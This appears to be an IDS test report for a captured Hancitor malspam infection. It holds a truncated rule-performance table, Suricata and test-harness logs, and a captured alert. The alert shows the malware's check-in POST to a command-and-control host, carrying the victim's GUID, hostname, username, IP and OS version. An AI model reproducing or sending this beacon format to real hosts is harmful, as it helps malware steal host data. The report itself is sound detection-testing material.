  6        2819881      1        2        469285       0.08   2        0        433043      234642.50   0.00        234642.50  
  7        2823858      1        3        2192217      0.39   61       0        420084      35937.98    0.00        35937.98   
  8        2807793      1        4        2197822      0.39   61       0        419282      36029.87    0.00        36029.87   
  9        2810607      1        8        522429       0.09   4        0        414997      130607.25   0.00        130607.25  
  10       2018496      1        9        441839       0.08   2        0        413467      220919.50   0.00        220919.50  
  11       2014967      1        3        1748162      0.31   61       0        412955      28658.39    0.00        28658.39   
  12       2815324      1        2        440232       0.08   2        0        411990      220116.00   0.00        220116.00  
  13       2024606      1        2        1756838      0.31   61       0        410266      28800.62    0.00        28800.62   
  14       2826256      1        2        1854688      0.33   66       0        403392      28101.33    0.00        28101.33   
  15       2016706      1        20       1763136      0.31   61       0        402905      28903.87    0.00        28903.87   
  16       2017731      1        3        400403       0.07   1        0        400403      400403.00   0.00        400403.00  
  17       2020865      1        3        1277695      0.23   7        0        294724      182527.86   0.00        182527.86  
  18       2022627      1        12       29921064     5.34   162      0        280873      184697.93   0.00        184697.93  
  19       2023476      1        5        17006011     3.04   162      0        271480      104975.38   0.00        104975.38  
  20       2815263      1        3        1144804      0.20   6        0        232870      190800.67   0.00        190800.67  
  21       2809148      1        2        218653       0.04   1        0        218653      218653.00   0.00        218653.00  
  22       2809149      1        2        204864       0.04   1        0        204864      204864.00   0.00        204864.00  
  23       2819664      1        2        912597       0.16   6        0        173935      152099.50   0.00        152099.50  
  24       2012520      1        7        164897       0.03   1        1        164897      164897.00   164897.00   0.00       
  25       2021749      1        6        227602       0.04   2        0        159178      113801.00   0.00        113801.00  
  26       2819930      1        2        897760       0.16   6        0        156654      149626.67   0.00        149626.67  
  27       2022535      1        11       14206629     2.54   162      0        154774      87695.24    0.00        87695.24   
  28       2804911      1        3        1249986      0.22   21       0        133330      59523.14    0.00        59523.14   
  29       2822213      1        2        8679469      1.55   164      0        132599      52923.59    0.00        52923.59   
  30       2829792      1        2        131472       0.02   1        0        131472      131472.00   0.00        131472.00  
  31       2824248      1        3        8588315      1.53   162      0        129557      53014.29    0.00        53014.29   
  32       2819978      1        5        3804480      0.68   59       59       123149      64482.71    64482.71    0.00       
  33       2827580      1        7        1479030      0.26   61       0        122187      24246.39    0.00        24246.39   
  34       2803027      1        6        1336791      0.24   18       0        119750      74266.17    0.00        74266.17   
  35       2828876      1        1        2869041      0.51   956      0        116124      3001.09     0.00        3001.09    
  36       2020181      1        8        2368566      0.42   61       0        114160      38828.95    0.00        38828.95   
  37       2810991      1        4        3039541      0.54   59       0        112478      51517.64    0.00        51517.64   
  38       2815817      1        5        2112479      0.38   66       0        111922      32007.26    0.00        32007.26   
  39       2021418      1        9        2787333      0.50   61       0        109246      45693.98    0.00        45693.98   
  40       2018457      1        1        5516991      0.98   164      0        109077      33640.19    0.00        33640.19   
  41       2803657      1        5        383678       0.07   5        0        107524      76735.60    0.00        76735.60   
  42       2828060      1        4        2053106      0.37   61       0        107284      33657.48    0.00        33657.48   
  43       2814020      1        2        2816386      0.50   162      0        106889      17385.10    0.00        17385.10   
  44       2820032      1        2        8192256      1.46   162      0        106266      50569.48    0.00        50569.48   
  45       2816877      1        5        8455963      1.51   162      0        105750      52197.30    0.00        52197.30   
  46       2821569      1        7        2329271      0.42   61       0        105631      38184.77    0.00        38184.77   
  47       2809363      1        3        2640061      0.47   61       0        105231      43279.69    0.00        43279.69   
  48       2020855      1        3        3675951      0.66   64       0        104761      57436.73    0.00        57436.73   
  49       2801930      1        7        1364909      0.24   22       0        104658      62041.32    0.00        62041.32   
  50       2814978      1        2        253422       0.05   3        0        104163      84474.00    0.00        84474.00   
  51       2023496      1        3        8284718      1.48   162      0        103948      51140.23    0.00        51140.23   
  52       2816328      1        5        1991158      0.36   66       0        103877      30169.06    0.00        30169.06   
  53       2801929      1        7        1428443      0.25   22       0        103293      64929.23    0.00        64929.23   
  54       2802987      1        5        1751384      0.31   30       0        102511      58379.47    0.00        58379.47   
  55       2816922      1        5        1978082      0.35   66       0        102221      29970.94    0.00        29970.94   
  56       2816356      1        2        2883339      0.51   64       0        101463      45052.17    0.00        45052.17   
  57       2820851      1        5        2607546      0.47   66       0        100814      39508.27    0.00        39508.27   
  58       2017259      1        12       3232929      0.58   59       0        100672      54795.41    0.00        54795.41   
  59       2809511      1        4        2253915      0.40   61       0        100146      36949.43    0.00        36949.43   
  60       2814487      1        1        250621       0.04   58       0        98728       4321.05     0.00        4321.05    
  61       2018005      1        6        7351144      1.31   164      0        96977       44824.05    0.00        44824.05   
  62       2021950      1        2        2885929      0.52   162      0        95898       17814.38    0.00        17814.38   
  63       2824398      1        2        1360838      0.24   59       0        94227       23065.05    0.00        23065.05   
  64       2816940      1        2        3793953      0.68   66       0        93449       57484.14    0.00        57484.14   
  65       2022502      1        4        3657086      0.65   65       0        92487       56262.86    0.00        56262.86   
  66       2816925      1        3        1939836      0.35   66       0        91630       29391.45    0.00        29391.45   
  67       2024769      1        2        180828       0.03   2        0        91518       90414.00    0.00        90414.00   
  68       2814979      1        2        235493       0.04   3        0        91358       78497.67    0.00        78497.67   
  69       2828986      1        2        2035438      0.36   61       0        91242       33367.84    0.00        33367.84   
  70       2816768      1        2        1890316      0.34   59       0        90964       32039.25    0.00        32039.25   
  71       2819993      1        2        2868565      0.51   59       0        90783       48619.75    0.00        48619.75   
  72       2823937      1        13       335178       0.06   61       0        89555       5494.72     0.00        5494.72    
  73       2824273      1        2        5885064      1.05   162      0        89379       36327.56    0.00        36327.56   
  74       2021868      1        2        2704525      0.48   162      0        89232       16694.60    0.00        16694.60   
  75       2807118      1        2        7564479      1.35   162      0        89211       46694.31    0.00        46694.31   
  76       2019094      1        5        2696736      0.48   63       0        88565       42805.33    0.00        42805.33   
  77       2816909      1        2        3986903      0.71   66       0        88199       60407.62    0.00        60407.62   
  78       2804907      1        3        581820       0.10   9        0        87669       64646.67    0.00        64646.67   
  79       2103158      1        6        2035993      0.36   653      0        86165       3117.91     0.00        3117.91    
  80       2829398      1        2        525915       0.09   9        0        84196       58435.00    0.00        58435.00   
  81       2021896      1        2        2701855      0.48   162      0        83893       16678.12    0.00        16678.12   
  82       2023350      1        2        2754741      0.49   162      0        83456       17004.57    0.00        17004.57   
  83       2816327      1        4        2589096      0.46   66       0        83226       39228.73    0.00        39228.73   
  84       2829539      1        1        20602156     3.68   1916     0        82359       10752.69    0.00        10752.69   
  85       2815568      1        2        1906109      0.34   61       0        81572       31247.69    0.00        31247.69   
  86       2816928      1        3        1899211      0.34   66       0        80052       28775.92    0.00        28775.92   
  87       2021921      1        2        2746002      0.49   162      0        79618       16950.63    0.00        16950.63   
  88       2820983      1        5        3006091      0.54   59       0        78886       50950.69    0.00        50950.69   
  89       2807970      1        8        2685448      0.48   61       0        78732       44023.74    0.00        44023.74   
  90       2021894      1        2        2905946      0.52   162      0        78625       17937.94    0.00        17937.94   
  91       2804157      1        4        78120        0.01   1        0        78120       78120.00    0.00        78120.00   
  92       2014956      1        1        493546       0.09   34       0        78075       14516.06    0.00        14516.06   
  93       2815254      1        7        240771       0.04   4        0        77322       60192.75    0.00        60192.75   
  94       2025180      1        1        1421547      0.25   59       0        77072       24094.02    0.00        24094.02   
  95       2024771      1        1        2086997      0.37   322      0        76579       6481.36     0.00        6481.36    
  96       2018358      1        7        112101       0.02   2        0        76090       56050.50    0.00        56050.50   
  97       2820600      1        2        439742       0.08   6        0        75438       73290.33    0.00        73290.33   
  98       2816929      1        4        2805261      0.50   66       0        74587       42503.95    0.00        42503.95   
  99       2816526      1        13       1964869      0.35   66       0        73760       29770.74    0.00        29770.74   
  100      2019837      1        3        93587        0.02   8        1        73711       11698.38    73711.00    2839.43    
  101      2812141      1        2        1754962      0.31   59       0        73309       29745.12    0.00        29745.12   
  102      2809859      1        6        1834583      0.33   63       0        73042       29120.37    0.00        29120.37   
  103      2823450      1        2        2705417      0.48   162      0        72618       16700.10    0.00        16700.10   
  104      2828743      1        3        411977       0.07   7        0        72086       58853.86    0.00        58853.86   
  105      2815886      1        2        1660402      0.30   62       0        70874       26780.68    0.00        26780.68   
  106      2804927      1        2        179353       0.03   3        0        70551       59784.33    0.00        59784.33   
  107      2816931      1        3        2003163      0.36   66       0        70530       30350.95    0.00        30350.95   
  108      2815478      1        5        2158142      0.39   59       0        70026       36578.68    0.00        36578.68   
  109      2013250      1        3        69987        0.01   1        0        69987       69987.00    0.00        69987.00   
  110      2023168      1        2        2795988      0.50   162      0        69264       17259.19    0.00        17259.19   
  111      2804158      1        3        68924        0.01   1        0        68924       68924.00    0.00        68924.00   
  112      2815363      1        3        2111699      0.38   59       0        68850       35791.51    0.00        35791.51   
  113      2021413      1        2        2299435      0.41   61       0        68689       37695.66    0.00        37695.66   
  114      2014411      1        11       126665       0.02   2        2        68262       63332.50    63332.50    0.00       
  115      2816165      1        5        1502233      0.27   66       0        68098       22761.11    0.00        22761.11   
  116      2017261      1        3        2600268      0.46   61       0        68078       42627.34    0.00        42627.34   
  117      2019343      1        3        1965394      0.35   64       0        68016       30709.28    0.00        30709.28   
  118      2014380      1        4        2542071      0.45   122      0        67665       20836.65    0.00        20836.65   
  119      2804626      1        9        1508869      0.27   66       0        67177       22861.65    0.00        22861.65   
  120      2821471      1        2        2624768      0.47   61       0        66358       43028.98    0.00        43028.98   
  121      2821561      1        2        1946745      0.35   63       0        65459       30900.71    0.00        30900.71   
  122      2812433      1        2        2195033      0.39   61       0        65414       35984.15    0.00        35984.15   
  123      2025064      1        5        2719895      0.49   66       0        65004       41210.53    0.00        41210.53   
  124      2816857      1        2        1388654      0.25   64       0        64807       21697.72    0.00        21697.72   
  125      2015986      1        5        1

This file has been truncated. Go here to download in full.


unified2.alert.1548677960 - (63963 bytes) - download
GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache

	f¹B	¸ÀPP;³POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: thenlorefuse.com
Content-Length: 126
Cache-Control: no-cache

GUID=5630222068961844480&BUILD=04qbx09&INFO=POPEYESAILOR-PC @ PopeyeSailor-PC\popeye.sailor&IP=12.34.56.78&TYPE=1&WIN=6.1(x64)

This file has been truncated. Go here to download in full.


IDSDeathBlossom.py.log - (1185 bytes) - download
2019-01-28 12:18:59,573 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-01-28 12:19:00,301 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-01-28 12:19:00,301 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etpro-all
2019-01-28 12:19:00,301 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-01-28 12:19:00,301 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-01-28 12:19:00,302 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/90a60290858e08e0e9d5f7a4d55e5dab56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap -vvv -k none
2019-01-28 12:19:23,263 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-01-28 12:19:23,264 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 23.7018799782


suricata-report-2019-01-28-T-12-19-23-01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap.txt - (17838 bytes) - download
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/90a60290858e08e0e9d5f7a4d55e5dab56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap -vvv -k none
elapsedtime:22.959764
stderr:
stdout:
28/1/2019 -- 12:19:00 - <Info> - Configuration node 'rule-files' redefined.
28/1/2019 -- 12:19:00 - <Notice> - This is Suricata version 4.0.0 RELEASE
28/1/2019 -- 12:19:00 - <Info> - CPUs/cores online: 1
28/1/2019 -- 12:19:00 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 32143 and 'request-body-inspect-window' set to 16915 after randomization.
28/1/2019 -- 12:19:00 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33477 and 'response-body-inspect-window' set to 17003 after randomization.
28/1/2019 -- 12:19:00 - <Config> - DNS request flood protection level: 500
28/1/2019 -- 12:19:00 - <Config> - DNS per flow memcap (state-memcap): 524288
28/1/2019 -- 12:19:00 - <Config> - DNS global memcap: 16777216
28/1/2019 -- 12:19:00 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
28/1/2019 -- 12:19:00 - <Config> - preallocated 1000 hosts of size 136
28/1/2019 -- 12:19:00 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
28/1/2019 -- 12:19:00 - <Config> - using magic-file /usr/share/file/magic
28/1/2019 -- 12:19:00 - <Config> - Core dump size is unlimited.
28/1/2019 -- 12:19:00 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
28/1/2019 -- 12:19:00 - <Config> - preallocated 1000 defrag trackers of size 168
28/1/2019 -- 12:19:00 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
28/1/2019 -- 12:19:00 - <Config> - stream "prealloc-sessions": 2048 (per thread)
28/1/2019 -- 12:19:00 - <Config> - stream "memcap": 33554432
28/1/2019 -- 12:19:00 - <Config> - stream "midstream" session pickups: disabled
28/1/2019 -- 12:19:00 - <Config> - stream "async-oneside": disabled
28/1/2019 -- 12:19:00 - <Config> - stream "checksum-validation": disabled
28/1/2019 -- 12:19:00 - <Config> - stream."inline": disabled
28/1/2019 -- 12:19:00 - <Config> - stream "bypass": disabled
28/1/2019 -- 12:19:00 - <Config> - stream "max-synack-queued": 5
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "memcap": 134217728
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "depth": 0
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "toserver-chunk-size": 2471
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "toclient-chunk-size": 2600
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly.raw: enabled
28/1/2019 -- 12:19:00 - <Config> - stream.reassembly "segment-prealloc": 2048
28/1/2019 -- 12:19:00 - <Config> - Delayed detect disabled
28/1/2019 -- 12:19:00 - <Config> - pattern matchers: MPM: ac, SPM: bm
28/1/2019 -- 12:19:00 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
28/1/2019 -- 12:19:00 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
28/1/2019 -- 12:19:00 - <Config> - prefilter engines: MPM
28/1/2019 -- 12:19:00 - <Config> - IP reputation disabled
28/1/2019 -- 12:19:00 - <Perf> - Registered 148 keyword profiling counters.
28/1/2019 -- 12:19:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
28/1/2019 -- 12:19:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
28/1/2019 -- 12:19:00 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
28/1/2019 -- 12:19:05 - <Config> - No rules loaded from ET-icmp.rules.
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
28/1/2019 -- 12:19:05 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
28/1/2019 -- 12:19:06 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
28/1/2019 -- 12:19:06 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
28/1/2019 -- 12:19:06 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
28/1/2019 -- 12:19:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
28/1/2019 -- 12:19:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
28/1/2019 -- 12:19:09 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
28/1/2019 -- 12:19:11 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
28/1/2019 -- 12:19:13 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
28/1/2019 -- 12:19:13 - <Config> - No rules loaded from local.rules.
28/1/2019 -- 12:19:13 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
28/1/2019 -- 12:19:13 - <Info> - Threshold config parsed: 0 rule(s) found
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tcp-packet
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tcp-stream
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for udp-packet
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for other-ip
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_uri
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_request_line
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_client_body
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_response_line
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_header
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_header
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_header_names
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_header_names
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_accept
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_accept_enc
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_accept_lang
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_referer
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_connection
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_content_len
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_content_len
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_content_type
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_content_type
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_protocol
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_protocol
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_start
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_start
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_raw_header
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_raw_header
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_method
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_cookie
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_cookie
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_raw_uri
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_user_agent
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_host
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_raw_host
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_stat_msg
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_stat_code
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for dns_query
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tls_sni
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tls_cert_issuer
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tls_cert_subject
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for tls_cert_serial
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for dce_stub_data
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for dce_stub_data
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for ssh_protocol
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for ssh_protocol
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for ssh_software
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for ssh_software
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for file_data
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for file_data
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_request_line
28/1/2019 -- 12:19:13 - <Perf> - using shared mpm ctx' for http_response_line
28/1/2019 -- 12:19:13 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
28/1/2019 -- 12:19:13 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
28/1/2019 -- 12:19:14 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
28/1/2019 -- 12:19:14 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
28/1/2019 -- 12:19:14 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
28/1/2019 -- 12:19:14 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
28/1/2019 -- 12:19:14 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
28/1/2019 -- 12:19:14 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
28/1/2019 -- 12:19:18 - <Perf> - Unique rule groups: 104
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toserver TCP packet": 35
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toclient TCP packet": 17
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toserver TCP stream": 33
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toclient TCP stream": 19
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toserver UDP packet": 27
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "toclient UDP packet": 17
28/1/2019 -- 12:19:18 - <Perf> - Builtin MPM "other IP packet": 3
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_uri": 14
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_request_line": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_client_body": 6
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_response_line": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_header": 10
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_header": 6
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_header_names": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_accept": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_referer": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_content_len": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_content_type": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_content_type": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_protocol": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_start": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_method": 5
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_cookie": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_cookie": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver http_host": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver dns_query": 4
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver tls_sni": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toserver file_data": 1
28/1/2019 -- 12:19:18 - <Perf> - AppLayer MPM "toclient file_data": 7
28/1/2019 -- 12:19:20 - <Perf> - Registered 39590 rule profiling counters.
28/1/2019 -- 12:19:20 - <Info> - fast output device (regular) initialized: alert
28/1/2019 -- 12:19:20 - <Info> - eve-log output device (regular) initialized: eve.json
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'alert'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'http'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'dns'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'tls'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'files'
28/1/2019 -- 12:19:20 - <Config> - enabling 'eve-log' module 'ssh'
28/1/2019 -- 12:19:20 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
28/1/2019 -- 12:19:20 - <Info> - stats output device (regular) initialized: stats.log
